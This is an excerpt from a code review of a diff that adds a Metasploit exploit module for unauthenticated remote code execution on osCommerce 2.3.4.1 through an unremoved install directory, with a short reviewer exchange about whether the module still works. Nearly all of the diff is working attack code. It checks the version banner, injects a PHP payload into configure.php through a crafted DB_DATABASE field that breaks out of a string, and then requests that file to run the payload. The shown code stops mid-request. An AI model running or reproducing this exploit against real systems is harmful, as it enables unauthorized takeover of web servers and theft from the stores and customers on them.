modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb

```diff
@@ -0,0 +1,85 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'osCommerce Installer Unauthenticated Code Execution',
+      'Description'    => %q{
+         If the /install/ directory was not removed, it is possible for an unauthenticated
+         attacker to run the "install_4.php" script, which will create the configuration
+         file for the installation. This allows the attacker to inject PHP code into the
+         configuration file and execute it.
+      },
+      'Author'         => [
+        'Simon Scannell',      # Original exploit author
+        'Daniel Teixeira'      # MSF module author
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['EDB', '44374'],
+        ],
+        'Payload'      =>
+        {
+          'BadChars' => "\x00",
+        },
+       'Privileged' => false,
+       'Platform'   => ['php'],
+       'Arch'       => ARCH_PHP,
+       'Targets' =>
+            [
+                [ 'osCommerce 2.3.4.1', { } ],
+            ],
+      'DisclosureDate' => 'Apr 30 2018',
+      'DefaultTarget' => 0))
+     register_options(
+    [
+      OptString.new('URI', [true, 'The path to the install directory', '/catalog/install/'])
+    ])
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(datastore['URI'], 'index.php'),
+      'method' => 'GET'
+    })
+
+    if res and res.code == 200 and res.body.include?('Welcome to osCommerce Online Merchant v2.3.4!')
+      return CheckCode::Vulnerable
+    end
+
+    return CheckCode::Safe
+  end
+
+  def trigger
+    send_request_cgi({
+      'uri'     => normalize_uri(datastore['URI'], 'includes/configure.php'),
+      'method'  => 'GET'
+    })
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    data = {
+      'DIR_FS_DOCUMENT_ROOT' => './',
+      'DB_DATABASE' => "');#{payload.encoded}/*"
+    }
+
+    res = send_request_cgi({
+      'uri'       => normalize_uri(datastore['URI'], 'install.php?step=4'),
+      'method'    => 'POST',
+      'vars_post' => data
```

Comment:
Have you confirmed the module still works after changing this to `vars_post` ?

Reply:
Sure it is working.